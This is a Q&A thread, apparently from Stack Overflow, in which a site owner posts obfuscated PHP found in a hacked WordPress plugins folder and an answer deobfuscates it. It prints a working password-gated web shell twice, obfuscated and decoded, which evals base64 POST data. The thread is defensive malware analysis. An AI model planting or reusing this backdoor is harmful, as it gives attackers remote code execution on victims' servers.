# Php Function Variable - Malware File

Tags: php, wordpress, malware-detection

Just a quick question....
I found a malicious file on a site (since removed) but I'm wondering what it's doing. Below is the code, any insight would be greatly appreciated.

```
function myfunc () {
$_myfunc1 = '63ebc49bf6d9fc5bed6af96a894db6cd';
$_myfunc2 = "\x63\x68\x72";
$_g1qm3 = $_g1qm2(115).$_g1qm2(116)."\x72".$_g1qm2(114)."\x65".$_g1qm2(118);
$_g1qm4 = $_g1qm3($_g1qm2(101).$_g1qm2(100)."\x6f\x63".$_g1qm2(101)."\x64".$_g1qm2(95).$_g1qm2(52)."\x36".$_g1qm2(101)."\x73\x61".$_g1qm2(98));
$_g1qm5 = $_g1qm3("\x65\x63".$_g1qm2(97)."\x6c\x70\x65".$_g1qm2(114)."\x5f\x67\x65".$_g1qm2(114)."\x70");
$_g1qm6 = $_g1qm3("\x6c".$_g1qm2(97)."\x76\x65");
$_g1qm5($_g1qm3('e'.$_g1qm2(47).'*./'),"@$_g1qm6($_g1qm4(\"JGxvZyA9ICdwcnQnOyBpZiAoIWlzc2V0KCRfU0VTU0lPTikpIHsgCXNlc3Npb25fc3RhcnQoKTsgfSBpZiAoaXNzZXQoJF9TRVNTSU9OWydsb2cnXSkgJiYgKCRfU0VTU0lPTlsnbG9nJ10gPT0gJGxvZykpIHsgCWlmIChpc3NldCgkX1BPU1RbJ210cSddKSkgeyAgCQkkcHQgPSBiYXNlNjRfZGVjb2RlKCRfUE9TVFsnbXRxJ10pOyAJCWV2YWwoJHB0KTsgCQlleGl0OyAJfSB9IGlmIChpc3NldCgkX1BPU1RbJ3B3eCddKSAmJiAobWQ1KCRfUE9TVFsncHd4J10pID09ICRfZzFxbTEpKSB7IAkkX1NFU1NJT05bJ2xvZyddID0gJGxvZzsgCWV4aXQ7IH0K\"))",'');} @_g1qm0();
}
```

Comment: Firstly I think this question would be better suited elsewhere, maybe on code review or security. And where does `$_g1qm2` come from? That is being set out of the blue.

Comment: @chriz It's not on topic on code review either! This isn't OP's code, and well... even if it was we don't do code explanation, we review code. Security would be the good fit, there already are questions like that there.

Comment: It's not on-topic on Code Review either.

Comment: Gah, well I will just get back into my hole! p.s. not saying I am right, but I did imply _maybe_. None the less it shouldn't be here.

Comment: @chriz It's alright, it indeed shouldn't be on StackOverflow. You tried something! :p Both Code Review and Programmers have guides on what's on-topic. You should check them if you want to propose migrations! :)

Comment: if you do a recursive de-obfuscation you will see the original code (although some variables are missing from the code posted) and see what it does, see for example [PHPDeObfuscator](https://github.com/foo123/PHPDeobfuscator) for an example how to do it

Comment: @TopinFrassi Goes to show how much time I spend elsewhere! I will definitely check out those topic pages. Thanks for understanding.

Comment: @TopinFrassi: Good luck grokking the on-topic rules for Programmers! I don't think even the mods have figured it out yet...

Comment: @LightnessRacesinOrbit In case of doubt, I hop in The Whiteboard and let them decide :p

Comment: thanks for the help guys sorry if this is in the wrong place. I'm just trying to find out if that code is trying to link to another file on the site that I may need to investigate.

Comment: @TopinFrassi: It's really not that much better there ;)

Answer (score 1, accepted):

This code is not complete but from what I've decoded it is:

```
$log = 'prt'; 

if (!isset($_SESSION)) {    
  session_start(); 
} 

if (isset($_SESSION['log']) && ($_SESSION['log'] == $log)) {    
    if (isset($_POST['mtq'])) {                 
        $pt = base64_decode($_POST['mtq']);         
        eval($pt);      
        exit;   
    }
 } 

 if (isset($_POST['pwx']) && (md5($_POST['pwx']) == $_g1qm1)) { 
    $_SESSION['log'] = $log;    exit; 
 }
```

So in simple words it looks from mtq param from POST request and executes it in shell. Data comes in base64 encoded format. It also stores one variable in session on key `log`

Also

`$_myfunc2 = "\x63\x68\x72";` it is decoded to `chr` which is function in PHP that returns character based on ASCII code.

`$_myfunc1 = '63ebc49bf6d9fc5bed6af96a894db6cd';`

looks like md5 hash but I'm not sure

```
$_g1qm3 = $_g1qm2(115).$_g1qm2(116)."\x72".$_g1qm2(114)."\x65".$_g1qm2(118);
```

It is $_g1qm3 is `strrev` function

```
$_g1qm4 = $_g1qm3($_g1qm2(101).$_g1qm2(100)."\x6f\x63".$_g1qm2(101)."\x64".$_g1qm2(95).$_g1qm2(52)."\x36".$_g1qm2(101)."\x73\x61".$_g1qm2(98));
```

It is base64_decode()

```
$_g1qm5 = $_g1qm3("\x65\x63".$_g1qm2(97)."\x6c\x70\x65".$_g1qm2(114)."\x5f\x67\x65".$_g1qm2(114)."\x70");
```

It's preg_replace()

```
 $_g1qm6 = $_g1qm3("\x6c".$_g1qm2(97)."\x76\x65")
```

It's eval()

Comment: Thanks guys, this was in a wordpress file that was sitting in the plugins folder of a site that recently got hacked. The code posted is incorrect, sorry, function starts out as    function $_g1qm0 () {
$_g1qm1 = '63ebc49bf6d9fc5bed6af96a894db6cd';
$_g1qm2 = "\x63\x68\x72";

Comment: I've updated answer.